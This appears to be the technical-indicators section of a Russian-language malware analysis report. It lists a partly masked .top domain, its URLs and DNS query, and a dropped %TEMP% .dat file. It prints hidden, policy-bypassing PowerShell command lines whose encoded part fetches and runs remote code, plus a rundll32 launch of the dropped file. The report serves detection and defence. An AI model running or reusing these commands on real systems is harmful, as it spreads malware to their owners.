Техническая информация
- http://re###tino.top/888g100/index.php
- %TEMP%\qyxptgdr.dat
- 're###tino.top':80
- http://re###tino.top/888g100/main.php
- DNS ASK re###tino.top
- '<SYSTEM32>\cmd.exe' /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBl...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBl...
- '<SYSTEM32>\rundll32.exe' %TEMP%\qYxPtGdr.dat f1